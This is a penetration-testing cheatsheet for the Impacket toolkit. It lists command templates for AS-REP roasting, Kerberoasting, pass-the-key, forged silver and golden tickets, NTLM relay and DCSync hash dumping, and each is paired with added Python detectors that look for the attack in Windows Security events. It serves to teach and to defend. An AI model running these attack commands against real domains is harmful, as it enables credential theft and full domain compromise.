Collaborated on by Ashley Knowles & Eric Harashevsky || Reviewed by: Matthew Eidelberg
This blog is part of Offensive Tooling Cheatsheets: An Infosec Survival Guide Resource. You can learn more and find all of the cheatsheets HERE: https://www.blackhillsinfosec.com/offensive-tooling-cheatsheets/
Impacket Cheatsheet: PRINT-FRIENDLY PDF
Find the tool here: https://github.com/fortra/impacket
Impacket is an extremely useful toolkit for post-exploitation. It is a collection of Python classes and scripts that provides low-level programmatic access to network packets and, for some protocols such as DCOM, Kerberos, SMB1, and MSRPC, the protocol implementation itself.
Threat actors often run the tool through a SOCKS proxy, which forwards network traffic from the client to the destination server and adds a layer of stealth.
Impacket is typically installed by default on Kali. On Windows or other Linux distributions, install it with pip or Docker.
Pip Installation:
python3 -m pipx install impacket
Docker Installation:
docker build -t "impacket:latest" .
docker run -it --rm "impacket:latest"
This author always recommends utilizing Python virtual environments with pip installations, as sometimes things can get wonky when installing multiple tools.
Python Virtual Environment Creation:
python3 -m venv <venv_dir>
Activate Virtual Environment:
source <venv_dir>/bin/activate
Scripts and Example Usage
You’ll find the various scripts, attack techniques, and example invocations discussed at a very high level.
ASREP-Roast
GetNPUsers.py
Retrieves AS-REP hashes for accounts that do not require Kerberos pre-authentication; the hashes can then be cracked offline. The specific attack is called AS-REP Roast.
Check ASREP-Roast for all domain users:
python GetNPUsers.py <domain>/<user>:<password> -request -format <hashcat|john> -outputfile <file>
Check ASREP-Roast for a list of users:
python GetNPUsers.py <domain>/ -usersfile <users_file> -format <hashcat|john> -outputfile <file>
Kerberoasting
GetUserSPNs.py
Conducts kerberoasting, where service principal names are queried and extracted along with their NTLM hashes.
python GetUserSPNs.py <domain>/<user>:<password> -outputfile <file>
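Both roasting techniques above leave a distinctive trace in the domain controller's Security log: GetNPUsers.py produces 4768 (TGT requested) events with pre-authentication type 0, and GetUserSPNs.py produces bursts of 4769 (service ticket requested) events with RC4 (0x17) encryption for user-account SPNs. The following is an added defensive example, not code from the cheatsheet or from Impacket; the event records are constructed, and the field names follow the Windows Security log schema.

```python
"""Flag AS-REP roasting and Kerberoasting indicators in Windows Security events.

Added defensive example (not from the cheatsheet or Impacket). Scans 4768 and
4769 events for the two patterns left behind by GetNPUsers.py and
GetUserSPNs.py. All event data below is constructed for illustration.
"""

# Ticket encryption types as logged in the TicketEncryptionType field.
RC4_HMAC = 0x17           # RC4 downgrade: what roasting tools request by default
AES_TYPES = {0x11, 0x12}  # AES128 / AES256, the expected modern default

# Constructed sample events (values invented for illustration).
SAMPLE_EVENTS = [
    # AS-REP roast: TGT issued without pre-authentication, RC4 encryption
    {"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": 0,
     "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.45", "Status": "0x0"},
    # Normal user logon: encrypted-timestamp pre-auth (type 2), AES
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": 2,
     "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.21", "Status": "0x0"},
    # Kerberoast: RC4 service tickets for several user-account SPNs from one host
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.45", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.45", "Status": "0x0"},
    # Machine-account service ticket: RC4 but a computer account, not crackable in practice
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "WS01$",
     "TicketEncryptionType": 0x17, "IpAddress": "10.0.0.22", "Status": "0x0"},
    # krbtgt is the TGT service itself and is excluded
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": 0x12, "IpAddress": "10.0.0.22", "Status": "0x0"},
]


def asrep_roast_candidates(events):
    """Return (account, source_ip) for successful 4768 events with PreAuthType 0.

    PreAuthType 0 means the KDC issued the AS-REP without pre-authentication,
    i.e. the account has DONT_REQ_PREAUTH set; RC4 makes the reply cheap to crack.
    Fixing the flagged accounts is the remediation, not just alerting.
    """
    return [(e["TargetUserName"], e["IpAddress"]) for e in events
            if e["EventID"] == 4768 and e["PreAuthType"] == 0
            and e["TicketEncryptionType"] == RC4_HMAC and e["Status"] == "0x0"]


def kerberoast_sources(events, min_services=2):
    """Return {source_ip: [services]} for hosts that requested RC4 service
    tickets for at least min_services distinct user-account SPNs.

    Machine accounts (trailing $) and krbtgt are excluded. A single RC4 request
    can be a legacy client; many different SPNs from one host in a short window
    is the Kerberoasting signature.
    """
    per_source = {}
    for e in events:
        if e["EventID"] != 4769 or e["Status"] != "0x0":
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":
            continue
        if e["TicketEncryptionType"] == RC4_HMAC:
            per_source.setdefault(e["IpAddress"], set()).add(svc)
    return {ip: sorted(s) for ip, s in per_source.items() if len(s) >= min_services}


if __name__ == "__main__":
    print("AS-REP roast candidates:", asrep_roast_candidates(SAMPLE_EVENTS))
    print("Kerberoast sources:", kerberoast_sources(SAMPLE_EVENTS))
```

Both checks depend on the "Audit Kerberos Authentication Service" and "Audit Kerberos Service Ticket Operations" subcategories being enabled on every domain controller; the RC4 filter stops being useful once service accounts have AES keys and RC4 is disabled domain-wide, at which point volume of 4769 per source is the remaining signal.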
Overpass The Hash / Pass The Key (PTK)
Request the TGT with hash:
python getTGT.py <domain>/<user> -hashes [lm_hash]:<nt_hash>
Request the TGT with password:
python getTGT.py <domain>/<user>:<password>
Set the TGT for Impacket use:
export KRB5CCNAME=<ticket_file>.ccache
Execute remote commands using the TGT. The following command works with psexec.py, smbexec.py, or wmiexec.py:
python psexec.py <domain>/<user>@<target> -k -no-pass
Silver / Golden Ticket Usage
To generate the TGS (silver ticket) with NTLM:
python ticketer.py -nthash <nt_hash> -domain-sid <domain_sid> -domain <domain> -spn <spn> <user>
To generate the TGT (golden ticket) with NTLM:
python ticketer.py -nthash <nt_hash> -domain-sid <domain_sid> -domain <domain> <user>
Set the ticket for Impacket use:
export KRB5CCNAME=<ticket_file>.ccache
Execute remote commands using the ticket. The following command works with psexec.py, smbexec.py, or wmiexec.py:
python psexec.py <domain>/<user>@<target> -k -no-pass
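A forged ticket loaded through KRB5CCNAME is never requested from the KDC, so the domain controllers see it being used (a 4769 for a golden ticket) without ever having issued it (no matching 4768). The correlation below is an added defensive example, not code from the cheatsheet or from Impacket; the events are constructed and the 10-hour window is the default domain TGT lifetime.

```python
"""Correlate Kerberos ticket events to spot TGTs the KDC never issued.

Added defensive example (not from the cheatsheet or Impacket). Looks for 4769
(service ticket requested) events with no 4768 (TGT requested) from the same
account and source address within one TGT lifetime. Event data is constructed.
"""
from datetime import datetime, timedelta

# Constructed sample events; TargetUserName in 4769 carries the realm suffix.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:00", "EventID": 4768, "TargetUserName": "alice",
     "IpAddress": "10.0.0.21"},
    {"time": "2024-05-01T09:00:03", "EventID": 4769, "TargetUserName": "alice@CORP.LOCAL",
     "IpAddress": "10.0.0.21", "ServiceName": "FS01$"},
    # Forged TGT in use: service ticket for the DC with no TGT request from this host
    {"time": "2024-05-01T09:10:00", "EventID": 4769, "TargetUserName": "Administrator@CORP.LOCAL",
     "IpAddress": "10.0.0.45", "ServiceName": "DC01$"},
    # TGT issued yesterday; a 4769 now is outside the default 10 h TGT lifetime
    {"time": "2024-04-30T08:00:00", "EventID": 4768, "TargetUserName": "bob",
     "IpAddress": "10.0.0.22"},
    {"time": "2024-05-01T09:20:00", "EventID": 4769, "TargetUserName": "bob@CORP.LOCAL",
     "IpAddress": "10.0.0.22", "ServiceName": "DC01$"},
]


def account(name):
    """Normalise 'user@REALM' and 'user' to the same lowercase key."""
    return name.split("@", 1)[0].lower()


def tgs_without_tgt(events, max_tgt_age=timedelta(hours=10)):
    """Return (user, ip, service) for 4769 events with no 4768 from the same
    (user, ip) within the preceding max_tgt_age.

    Caveats: TGT renewals log 4770 (not handled here), and events from every
    DC must be in scope, otherwise a TGT issued by another DC looks forged.
    ISO-8601 timestamps sort correctly as strings.
    """
    tgt_times = {}
    flagged = []
    for e in sorted(events, key=lambda x: x["time"]):
        when = datetime.fromisoformat(e["time"])
        key = (account(e["TargetUserName"]), e["IpAddress"])
        if e["EventID"] == 4768:
            tgt_times.setdefault(key, []).append(when)
        elif e["EventID"] == 4769:
            recent = [t for t in tgt_times.get(key, []) if when - max_tgt_age <= t <= when]
            if not recent:
                flagged.append((key[0], key[1], e["ServiceName"]))
    return flagged


if __name__ == "__main__":
    for user, ip, svc in tgs_without_tgt(SAMPLE_EVENTS):
        print(f"service ticket for {svc} by {user} from {ip} with no TGT request")
```

A silver ticket never touches the DC at all, so the equivalent check for it is the mirror image: a 4624 Kerberos logon on the service host for which no DC logged a 4769. In both cases the durable fix is rotating the compromised key (the service account password, or the krbtgt password twice) rather than tuning the alert.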
NTLMRelay from Responder to Targets
NTLMRelayx is used to relay intercepted or coerced credentials to a target. It is often used in conjunction with Responder, PetitPotam, or MiTM6.
Turn off the SMB server in Responder by editing the Responder.conf file.
Make a list of targets with SMB signing disabled using NetExec.
nxc smb <targets> --gen-relay-list <outfile>
Ensure ntlmrelayx.py has been started prior to Responder.
python ntlmrelayx.py -wh <attacker_host> -tf <targets_file> -socks -smb2support
Start Responder.
After successful authentication, type “socks” to get SOCKS connections retrieved by ntlmrelayx.
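When an NTLM exchange is relayed, the victim's workstation name travels inside the NTLM messages, but the TCP connection to the target comes from the relay host, so the target's 4624 logon event records a WorkstationName that does not belong to the IpAddress. The check below is an added defensive example, not code from the cheatsheet or from Impacket; the INVENTORY mapping and the logon events are constructed (in practice the mapping comes from DHCP leases or DNS).

```python
"""Flag NTLM network logons whose source address does not match the
workstation named in the authentication (an NTLM relay indicator).

Added defensive example (not from the cheatsheet or Impacket). INVENTORY and
SAMPLE_LOGONS are constructed; field names follow the Windows Security log.
"""

# Constructed inventory: workstation name -> address it is expected to use.
INVENTORY = {"WS01": "10.0.0.21", "WS02": "10.0.0.22", "FS01": "10.0.0.30"}

SAMPLE_LOGONS = [
    # Benign NTLM network logon: the claimed workstation matches the source
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "alice", "WorkstationName": "WS01", "IpAddress": "10.0.0.21"},
    # Relayed: WS02's credentials arrive from another host
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "bob", "WorkstationName": "WS02", "IpAddress": "10.0.0.45"},
    # Kerberos logon: not subject to NTLM relay, skipped
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "carol", "WorkstationName": "FS01", "IpAddress": "10.0.0.30"},
    # Interactive logon (type 2): not a network authentication, skipped
    {"EventID": 4624, "LogonType": 2, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "dave", "WorkstationName": "WS01", "IpAddress": "127.0.0.1"},
    # Workstation not in inventory: undecidable, reported for follow-up
    {"EventID": 4624, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "erin", "WorkstationName": "LAPTOP-9X", "IpAddress": "10.0.0.77"},
]


def relay_suspects(logons, inventory):
    """Return (suspects, unknown).

    suspects: (user, workstation, expected_ip, actual_ip) for NTLM type-3
    logons whose source address disagrees with the inventory.
    unknown: workstation names the inventory cannot resolve, so no verdict.
    """
    suspects, unknown = [], []
    for e in logons:
        if e["EventID"] != 4624 or e["LogonType"] != 3:
            continue
        if e["AuthenticationPackageName"] != "NTLM":
            continue
        name = e["WorkstationName"].upper()
        expected = inventory.get(name)
        if expected is None:
            unknown.append(name)
        elif expected != e["IpAddress"]:
            suspects.append((e["TargetUserName"], name, expected, e["IpAddress"]))
    return suspects, unknown


if __name__ == "__main__":
    suspects, unknown = relay_suspects(SAMPLE_LOGONS, INVENTORY)
    for user, ws, expected, actual in suspects:
        print(f"{user}: {ws} expected at {expected}, authenticated from {actual}")
    print("unresolved workstations:", unknown)
```

The mismatch is a signal, not proof: WorkstationName can be empty or set by the client, and laptops roam. The remediation that removes the class of attack is the one the `--gen-relay-list` step above is probing for: require SMB signing on every host, enforce LDAP signing and channel binding on domain controllers, and disable NTLM where possible.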
secretsdump.py
Performs a DCSync attack against the Domain Controller and dumps all user and machine hashes in the domain. Requires an account with DCSync (replication) permissions or Domain Admin.
DCSync via password:
python secretsdump.py <domain>/<user>:'<password>'@<dc_ip> > <outfile>
DCSync via pass-the-hash:
python secretsdump.py <domain>/<user>@<dc_ip> -hashes :<nt_hash> > <outfile>
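DCSync asks a domain controller for directory replication data, and a DC with directory service access auditing enabled records that request as event 4662 carrying the replication control-access right GUIDs. Legitimate replication comes from other DCs' machine accounts (and, in hybrid environments, the Azure AD Connect account), so a replication request from anyone else is the detection. The following is an added defensive example, not code from the cheatsheet or from Impacket; the events and the DC_ACCOUNTS set are constructed, while the three GUIDs are the published control-access rights.

```python
"""Flag directory replication requests (DCSync) from non-DC accounts.

Added defensive example (not from the cheatsheet or Impacket). Scans 4662
events for the DS-Replication-Get-Changes* rights. Event data and the list
of DC machine accounts are constructed.
"""
import re

# Control-access right GUIDs as they appear (braced) in the 4662 Properties field.
REPLICATION_RIGHTS = {
    "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes",
    "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}": "DS-Replication-Get-Changes-All",
    "{89e95b76-444d-4c62-991a-0facbeda640c}": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = "0x100"  # AccessMask value for a control-access right
GUID_RE = re.compile(r"\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}", re.I)

# Constructed: machine accounts of the domain controllers (uppercase).
DC_ACCOUNTS = {"DC01$", "DC02$"}

SAMPLE_EVENTS = [
    # Normal DC-to-DC replication
    {"EventID": 4662, "SubjectUserName": "DC02$", "AccessMask": "0x100",
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # DCSync from a user account
    {"EventID": 4662, "SubjectUserName": "jsmith", "AccessMask": "0x100",
     "Properties": "%%7688\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n"
                   "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Unrelated control-access operation by the same user (constructed GUID)
    {"EventID": 4662, "SubjectUserName": "jsmith", "AccessMask": "0x100",
     "Properties": "%%7688\n{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"},
    # Read access (0x10) mentioning a replication GUID is not a DCSync
    {"EventID": 4662, "SubjectUserName": "jsmith", "AccessMask": "0x10",
     "Properties": "%%7684\n{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def dcsync_suspects(events, dc_accounts):
    """Return (account, [rights]) for 4662 control-access events that carry a
    replication right and come from an account not in dc_accounts."""
    hits = []
    for e in events:
        if e["EventID"] != 4662 or e["AccessMask"] != CONTROL_ACCESS:
            continue
        rights = sorted({REPLICATION_RIGHTS[g.lower()]
                         for g in GUID_RE.findall(e["Properties"])
                         if g.lower() in REPLICATION_RIGHTS})
        if not rights or e["SubjectUserName"].upper() in dc_accounts:
            continue
        hits.append((e["SubjectUserName"], rights))
    return hits


if __name__ == "__main__":
    for who, rights in dcsync_suspects(SAMPLE_EVENTS, DC_ACCOUNTS):
        print(f"replication request from {who}: {', '.join(rights)}")
```

The DC only emits these 4662 events when the "Audit Directory Service Access" subcategory is enabled and the domain object carries a SACL auditing control access for Everyone; without that, the request is simply not logged. A hit also means auditing who holds the replication rights on the domain object, since secretsdump.py only works for accounts that already have them.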

Explore the Infosec Survival Guide and more… for FREE!
Get instant access to all issues of the Infosec Survival Guide, as well as content like our self-published infosec zine, PROMPT#, and exclusive Darknet Diaries comics—all available at no cost.
You can check out all current and upcoming issues here: https://www.blackhillsinfosec.com/prompt-zine/